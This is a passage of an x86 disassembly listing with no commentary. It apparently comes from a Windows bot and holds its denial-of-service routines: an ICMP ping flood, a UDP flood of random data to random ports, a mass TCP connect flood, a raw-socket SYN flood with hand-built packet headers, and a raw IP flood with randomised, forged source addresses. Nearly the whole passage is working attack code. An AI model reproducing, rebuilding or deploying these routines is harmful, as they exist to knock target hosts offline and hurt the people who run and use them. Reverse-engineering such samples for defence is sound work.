var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
Dst = byte ptr -20h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10320h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
push 1
pop edi
mov [eax+120h], edi
call dword_4E41A8 ; IcmpCreateFile
mov [ebp+arg_0], eax
lea eax, [ebp+var_C0]
push eax
call dword_4E4260 ; inet_addr
mov esi, eax
xor ebx, ebx
xor eax, eax
cmp esi, 0FFFFFFFFh
jnz short loc_413D98
lea eax, [ebp+var_C0]
push eax
call dword_4E42A4 ; gethostbyname
cmp eax, ebx
jz short loc_413D9E
loc_413D98: ; CODE XREF: sub_413D3D+48�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_413DFB
loc_413D9E: ; CODE XREF: sub_413D3D+59�j
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+Dest]
push offset asc_44DD64 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_413DDE
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_144] ; int
call sub_409D6C
add esp, 14h
loc_413DDE: ; CODE XREF: sub_413D3D+7F�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_30]
call sub_40BAAA
pop ecx
pop ecx
push edi
call ds:dword_4F63D4 ; ExitThread
loc_413DFB: ; CODE XREF: sub_413D3D+5F�j
cmp eax, ebx
jz short loc_413E0B
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4], eax
jmp short loc_413E0E
; ---------------------------------------------------------------------------
loc_413E0B: ; CODE XREF: sub_413D3D+C0�j
mov [ebp+var_4], esi
loc_413E0E: ; CODE XREF: sub_413D3D+CC�j
push 1Ch ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
or [ebp+var_18], 0FFFFFFFFh
mov eax, 0FFDCh
add esp, 0Ch
cmp [ebp+var_3C], eax
jle short loc_413E2E
mov [ebp+var_3C], eax
loc_413E2E: ; CODE XREF: sub_413D3D+EC�j
cmp [ebp+var_38], edi
jge short loc_413E36
mov [ebp+var_38], edi
loc_413E36: ; CODE XREF: sub_413D3D+F4�j
xor esi, esi
cmp [ebp+var_40], ebx
jle short loc_413E63
loc_413E3D: ; CODE XREF: sub_413D3D+124�j
push [ebp+var_38]
lea eax, [ebp+Dst]
push 1Ch
push eax
push ebx
lea eax, [ebp+var_10320]
push [ebp+var_3C]
push eax
push [ebp+var_4]
push [ebp+arg_0]
call dword_4E4138 ; IcmpSendEcho
inc esi
cmp esi, [ebp+var_40]
jl short loc_413E3D
loc_413E63: ; CODE XREF: sub_413D3D+FE�j
push [ebp+arg_0]
call dword_4E42D8 ; IcmpCloseHandle
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+Dest]
push offset asc_44DD8C ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_413EAC
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_144] ; int
call sub_409D6C
add esp, 14h
loc_413EAC: ; CODE XREF: sub_413D3D+14D�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_30]
call sub_40BAAA
pop ecx
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
sub_413D3D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413EC9 proc near ; DATA XREF: sub_401CC7+58A9�o
var_10311 = byte ptr -10311h
var_10310 = byte ptr -10310h
Dest = byte ptr -334h
var_134 = dword ptr -134h
Str = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10310h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_134]
rep movsd
push 1
pop esi
mov [eax+120h], esi
call ds:dword_4F63B0 ; GetTickCount
push eax ; Seed
call _srand
pop ecx
push 11h
push 2
push 2
call dword_4E42A0 ; socket
mov ebx, eax
xor edi, edi
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_B0]
mov [ebp+Dst], 2
push eax
call dword_4E4260 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_413FAE
lea eax, [ebp+var_B0]
push eax
call dword_4E42A4 ; gethostbyname
cmp eax, edi
jnz short loc_413FA7
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+Dest]
push offset asc_44DDB8 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_413F8A
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_1C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_134] ; int
call sub_409D6C
add esp, 14h
loc_413F8A: ; CODE XREF: sub_413EC9+9F�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_20]
call sub_40BAAA
pop ecx
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
loc_413FA7: ; CODE XREF: sub_413EC9+7F�j
mov eax, [eax+0Ch]
mov eax, [eax]
jmp short loc_413FB1
; ---------------------------------------------------------------------------
loc_413FAE: ; CODE XREF: sub_413EC9+6E�j
lea eax, [ebp+arg_0]
loc_413FB1: ; CODE XREF: sub_413EC9+E3�j
mov eax, [eax]
cmp [ebp+var_24], edi
mov [ebp+var_C], eax
jnz short loc_413FCC
call _rand
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
jmp short loc_413FCF
; ---------------------------------------------------------------------------
loc_413FCC: ; CODE XREF: sub_413EC9+F0�j
push [ebp+var_24]
loc_413FCF: ; CODE XREF: sub_413EC9+101�j
call dword_4E4220 ; htons
cmp [ebp+var_24], esi
mov [ebp+var_E], ax
jge short loc_413FE1
mov [ebp+var_24], esi
loc_413FE1: ; CODE XREF: sub_413EC9+113�j
mov eax, 0FFFFh
cmp [ebp+var_24], eax
jle short loc_413FEE
mov [ebp+var_24], eax
loc_413FEE: ; CODE XREF: sub_413EC9+120�j
mov eax, [ebp+var_30]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp+var_28], edi
mov [ebp+var_30], eax
jnz short loc_414002
mov [ebp+var_28], esi
loc_414002: ; CODE XREF: sub_413EC9+134�j
xor esi, esi
cmp [ebp+var_2C], edi
jle short loc_414023
loc_414009: ; CODE XREF: sub_413EC9+158�j
call _rand
cdq
mov ecx, 0FFh
idiv ecx
inc esi
cmp esi, [ebp+var_2C]
mov [ebp+esi+var_10311], dl
jl short loc_414009
loc_414023: ; CODE XREF: sub_413EC9+13E�j
; sub_413EC9+19C�j ...
mov eax, [ebp+var_30]
dec [ebp+var_30]
test eax, eax
jle short loc_414082
push 0Bh
pop esi
loc_414030: ; CODE XREF: sub_413EC9+197�j
lea eax, [ebp+Dst]
push 10h
push eax
push edi
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_2C]
sub eax, edx
push eax
lea eax, [ebp+var_10310]
push eax
push ebx
call dword_4E4284 ; sendto
push [ebp+var_28]
call ds:dword_4F6380 ; Sleep
dec esi
jnz short loc_414030
cmp [ebp+var_24], edi
jnz short loc_414023
call _rand
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
call dword_4E4220 ; htons
mov [ebp+var_E], ax
jmp short loc_414023
; ---------------------------------------------------------------------------
loc_414082: ; CODE XREF: sub_413EC9+162�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+Dest]
push offset asc_44DDE0 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_4140C2
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_1C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_134] ; int
call sub_409D6C
add esp, 14h
loc_4140C2: ; CODE XREF: sub_413EC9+1D7�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_20]
call sub_40BAAA
pop ecx
pop ecx
push edi
call ds:dword_4F63D4 ; ExitThread
sub_413EC9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4140DF proc near ; DATA XREF: sub_401CC7+4EF4�o
Dest = byte ptr -414h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_190 = byte ptr -190h
var_110 = dword ptr -110h
Str = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax ; int
lea eax, [ebp+var_190]
push eax ; Str
lea eax, [ebp+var_210]
push eax ; int
call sub_414240
add esp, 0Ch
push eax
lea eax, [ebp+Dest]
push offset asc_44DE0C ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_41415F
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_214] ; int
call sub_409D6C
add esp, 14h
loc_41415F: ; CODE XREF: sub_4140DF+5E�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_10]
call sub_40BAAA
pop ecx
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
pop edi
pop esi
sub_4140DF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41417E proc near ; CODE XREF: sub_414240+27�p
var_654 = byte ptr -654h
Dst = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 654h
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+arg_4]
call dword_4E4220 ; htons
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
test eax, eax
mov [ebp+var_4], 1
jle short loc_41423C
push ebx
push esi
push edi
mov [ebp+arg_4], eax
mov edi, 190h
loc_4141C9: ; CODE XREF: sub_41417E+B9�j
lea esi, [ebp+var_654]
mov ebx, edi
loc_4141D1: ; CODE XREF: sub_41417E+7A�j
push 0
push 1
push 2
call ds:dword_4F6570 ; socket
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_4141F4
lea ecx, [ebp+var_4]
push ecx
push 8004667Eh
push eax
call ds:dword_4F6548 ; ioctlsocket
loc_4141F4: ; CODE XREF: sub_41417E+64�j
add esi, 4
dec ebx
jnz short loc_4141D1
lea esi, [ebp+var_654]
mov ebx, edi
loc_414202: ; CODE XREF: sub_41417E+96�j
lea eax, [ebp+Dst]
push 10h
push eax
push dword ptr [esi]
call ds:dword_4F6564 ; connect
add esi, 4
dec ebx
jnz short loc_414202
push 64h
call ds:dword_4F6380 ; Sleep
lea esi, [ebp+var_654]
mov ebx, edi
loc_414226: ; CODE XREF: sub_41417E+B4�j
push dword ptr [esi]
call ds:dword_4F656C ; closesocket
add esi, 4
dec ebx
jnz short loc_414226
dec [ebp+arg_4]
jnz short loc_4141C9
pop edi
pop esi
pop ebx
loc_41423C: ; CODE XREF: sub_41417E+3E�j
xor eax, eax
leave
retn
sub_41417E endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_414240(int,char *Str,int)
sub_414240 proc near ; CODE XREF: sub_4140DF+3C�p
arg_0 = dword ptr 4
Str = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40AE8D
push [esp+10h+Str] ; Str
mov edi, eax
call _atoi
push [esp+14h+arg_8] ; Str
mov ebx, eax
call _atoi
mov esi, eax
push esi
push ebx
push edi
call sub_41417E
add esp, 18h
test eax, eax
jnz short loc_414276
push 1
pop eax
loc_414276: ; CODE XREF: sub_414240+31�j
cdq
mov ecx, 3E8h
pop edi
idiv ecx
cdq
idiv esi
pop esi
pop ebx
retn
sub_414240 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414285 proc near ; DATA XREF: sub_401CC7+659B�o
Dest = byte ptr -414h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_190 = byte ptr -190h
var_110 = dword ptr -110h
Str = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax ; int
lea eax, [ebp+var_190]
push eax ; Str
lea eax, [ebp+var_210]
push eax ; int
call sub_4145D6
add esp, 0Ch
push eax
lea eax, [ebp+Dest]
push offset asc_44DE38 ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_414305
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_214] ; int
call sub_409D6C
add esp, 14h
loc_414305: ; CODE XREF: sub_414285+5E�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_10]
call sub_40BAAA
pop ecx
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
pop edi
pop esi
sub_414285 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414324 proc near ; CODE XREF: sub_4145D6+3C�p
var_284 = byte ptr -284h
Dest = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
Src = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = dword ptr -58h
Dst = word ptr -50h
var_4E = word ptr -4Eh
var_4C = dword ptr -4Ch
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = byte ptr -20h
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call dword_4E4190 ; WSAStartup
test eax, eax
jz short loc_414364
xor eax, eax
jmp loc_4145D2
; ---------------------------------------------------------------------------
loc_414364: ; CODE XREF: sub_414324+37�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_4E42C4 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_4145CA
push esi
lea ecx, [ebp+var_38]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_38], edi
call dword_4E4200 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_4145C0
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+arg_8]
call dword_4E4220 ; htons
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_4E], ax
mov [ebp+var_4C], esi
mov [ebp+var_20], 45h
call dword_4E4220 ; htons
push [ebp+arg_8]
mov [ebp+var_1E], ax
mov [ebp+var_1C], di
mov [ebp+var_1A], bx
mov [ebp+var_18], 80h
mov [ebp+var_17], 6
mov [ebp+var_16], bx
mov [ebp+var_10], esi
call dword_4E4220 ; htons
push 4000h
mov [ebp+var_32], ax
mov [ebp+var_2C], ebx
mov [ebp+var_28], 50h
mov [ebp+var_27], 2
call dword_4E4220 ; htons
mov [ebp+var_26], ax
lea eax, [ebp+var_40]
push eax
mov [ebp+var_22], bx
mov [ebp+arg_8], ebx
call ds:dword_4F62F8 ; QueryPerformanceFrequency
lea eax, [ebp+var_8]
push eax
call ds:dword_4F643C ; QueryPerformanceCounter
push [ebp+var_3C]
mov eax, [ebp+arg_C]
cdq
push [ebp+var_40]
push edx
push eax
call __allmul
add eax, [ebp+var_8]
mov esi, edx
adc esi, [ebp+var_4]
mov [ebp+var_58], eax
loc_41444F: ; CODE XREF: sub_414324+25D�j
; sub_414324+26B�j
mov [ebp+var_24], bx
call _rand
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_4E4220 ; htons
mov [ebp+var_34], ax
call _rand
mov edi, eax
shl edi, 10h
call _rand
or edi, eax
push edi
call dword_4E4220 ; htons
movzx eax, ax
mov [ebp+var_30], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call dword_4E421C ; htonl
push 14h
mov [ebp+var_14], eax
mov eax, [ebp+var_10]
pop edi
push edi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call dword_4E4220 ; htons
mov [ebp+var_6E], ax
mov eax, [ebp+var_14]
mov [ebp+Src], eax
lea eax, [ebp+Src]
push 20h ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_34]
push edi ; Size
push eax ; Src
lea eax, [ebp+var_94]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40B002
mov [ebp+var_24], ax
lea eax, [ebp+var_20]
push edi ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_34]
push edi ; Size
push eax ; Src
lea eax, [ebp+var_A0]
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+var_8C]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40B002
mov [ebp+var_16], ax
lea eax, [ebp+var_20]
push edi ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
add esp, 14h
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_C]
call dword_4E4284 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_414594
add [ebp+arg_8], eax
lea eax, [ebp+var_8]
push eax
call ds:dword_4F643C ; QueryPerformanceCounter
mov eax, [ebp+var_4]
cmp eax, esi
jg short loc_4145BD
jl loc_41444F
mov eax, [ebp+var_8]
cmp eax, [ebp+var_58]
jnb short loc_4145BD
jmp loc_41444F
; ---------------------------------------------------------------------------
loc_414594: ; CODE XREF: sub_414324+247�j
call dword_4E41B4 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_44DE60 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push eax
call sub_415C77
add esp, 10h
jmp short loc_4145C0
; ---------------------------------------------------------------------------
loc_4145BD: ; CODE XREF: sub_414324+25B�j
; sub_414324+269�j
mov ebx, [ebp+arg_8]
loc_4145C0: ; CODE XREF: sub_414324+78�j
; sub_414324+297�j
push [ebp+var_C]
call dword_4E42B8 ; closesocket
pop esi
loc_4145CA: ; CODE XREF: sub_414324+5B�j
call dword_4E4178 ; WSACleanup
mov eax, ebx
loc_4145D2: ; CODE XREF: sub_414324+3B�j
pop edi
pop ebx
leave
retn
sub_414324 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4145D6(int,char *Str,int)
sub_4145D6 proc near ; CODE XREF: sub_414285+3C�p
arg_0 = dword ptr 4
Str = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40AE8D
push [esp+10h+Str] ; Str
mov esi, eax
call _atoi
push [esp+14h+arg_8] ; Str
mov ebx, eax
call _atoi
mov edi, eax
call _rand
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
lea eax, [edx+esi+100h]
push eax
push esi
call sub_414324
add esp, 1Ch
test eax, eax
jnz short loc_414621
push 1
pop eax
loc_414621: ; CODE XREF: sub_4145D6+46�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_4145D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414630 proc near ; DATA XREF: sub_401CC7+6F6D�o
Dest = byte ptr -394h
var_194 = dword ptr -194h
var_190 = byte ptr -190h
Str = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 394h
mov eax, [ebp+arg_0]
push esi
push edi
push 65h
pop ecx
mov esi, eax
lea edi, [ebp+var_194]
rep movsd
mov dword ptr [eax+190h], 1
lea eax, [ebp+Str]
push eax ; Str
call _atoi
pop ecx
push eax
lea eax, [ebp+var_190]
push eax
call dword_4E4260 ; inet_addr
push eax
call sub_4146D3
pop ecx
pop ecx
push eax
lea eax, [ebp+Dest]
push offset asc_44DE80 ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_4146B4
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_90]
push eax ; Str
push [ebp+var_194] ; int
call sub_409D6C
add esp, 14h
loc_4146B4: ; CODE XREF: sub_414630+62�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_10]
call sub_40BAAA
pop ecx
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
pop edi
pop esi
sub_414630 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4146D3 proc near ; CODE XREF: sub_414630+41�p
var_98 = word ptr -98h
var_96 = word ptr -96h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
Src = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
Memory = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 98h
push ebx
push esi
push edi
push 1
pop ecx
and [ebp+var_88], 0
push 4
and [ebp+var_58], 0
pop esi
mov ebx, 0FFh
push 6
xor eax, eax
pop edx
lea edi, [ebp+var_54]
mov [ebp+var_84], ecx
mov [ebp+var_80], 2
mov [ebp+var_7C], esi
mov [ebp+var_78], edx
mov [ebp+var_74], 8
mov [ebp+var_70], 0Ch
mov [ebp+var_6C], 11h
mov [ebp+var_68], 16h
mov [ebp+var_64], 29h
mov [ebp+var_60], 3Ah
mov [ebp+var_5C], ebx
mov [ebp+var_50], eax
stosd
lea edi, [ebp+var_2C]
mov [ebp+var_4C], eax
mov [ebp+var_48], eax
mov [ebp+var_44], 2000h
mov [ebp+var_40], esi
mov [ebp+var_3C], edx
mov [ebp+var_38], 3FFFh
mov [ebp+var_34], ecx
mov [ebp+var_30], eax
mov [ebp+var_28], ecx
stosd
mov edi, 100h
push edi ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
pop ecx
mov [ebp+var_4], eax
push edi
push eax
call dword_4E4234 ; gethostname
push [ebp+var_4]
call dword_4E42A4 ; gethostbyname
mov eax, [eax+0Ch]
push ebx
push 3
push 2
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_C], eax
call dword_4E42A0 ; socket
lea ecx, [ebp+var_28]
push esi
push ecx
push 2
push 0
push eax
mov [ebp+var_4], eax
call dword_4E4200 ; setsockopt
mov esi, 200h
push esi ; Size
call _malloc
mov edi, ds:dword_4F63B0
pop ecx
mov [ebp+Memory], eax
call edi ; GetTickCount
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
push 29Ah
mov [ebp+var_94], eax
mov [ebp+var_98], 2
call dword_4E4220 ; htons
mov [ebp+var_96], ax
loc_4147EE: ; CODE XREF: sub_4146D3+1FC�j
call edi ; GetTickCount
sub eax, [ebp+var_10]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_4]
ja loc_4148D4
call _rand
cdq
mov ecx, ebx
idiv ecx
mov eax, [ebp+var_C]
and eax, 0FFFFFFh
shl edx, 18h
or edx, eax
mov [ebp+var_C], edx
call _rand
cdq
mov ecx, ebx
idiv ecx
mov [ebp+var_54], edx
call _rand
cdq
mov ecx, 1FA4h
mov [ebp+Src], 45h
idiv ecx
mov [ebp+var_23], 4
mov [ebp+var_2C], edx
call _rand
mov [ebp+var_20], ax
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
mov ax, word ptr [ebp+edx*4+var_50]
push eax
call dword_4E4220 ; htons
push esi
mov [ebp+var_1E], ax
call dword_4E4220 ; htons
mov [ebp+var_22], ax
mov [ebp+var_1C], bl
call _rand
push 0Eh
cdq
pop ecx
idiv ecx
push 14h
mov al, byte ptr [ebp+edx*4+var_88]
mov [ebp+var_1B], al
mov eax, [ebp+var_C]
mov [ebp+var_18], eax
mov eax, [ebp+arg_0]
mov [ebp+var_14], eax
lea eax, [ebp+Src]
push eax
call sub_40B002
mov [ebp+var_1A], ax
lea eax, [ebp+Src]
push 14h ; Size
push eax ; Src
push [ebp+Memory] ; Dst
call _memcpy
add esp, 14h
lea eax, [ebp+var_98]
push 10h
push eax
push 0
push esi
push [ebp+Memory]
push [ebp+var_4]
call dword_4E4284 ; sendto
jmp loc_4147EE
; ---------------------------------------------------------------------------
loc_4148D4: ; CODE XREF: sub_4146D3+12C�j
push [ebp+Memory] ; Memory
call _free
pop ecx
push [ebp+var_4]
call dword_4E42B8 ; closesocket
push 1
pop eax
pop edi
pop esi
pop ebx
leave
retn
sub_4146D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4148EE proc near ; DATA XREF: sub_401CC7+5536�o
Dest = byte ptr -440h
var_240 = dword ptr -240h
var_23C = byte ptr -23Ch
Str = byte ptr -1BCh
var_13C = byte ptr -13Ch
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A0 = byte ptr -0A0h
var_9F = byte ptr -9Fh
var_8C = byte ptr -8Ch
var_80 = byte ptr -80h
var_78 = byte ptr -78h
Src = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
Dst = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = word ptr -8
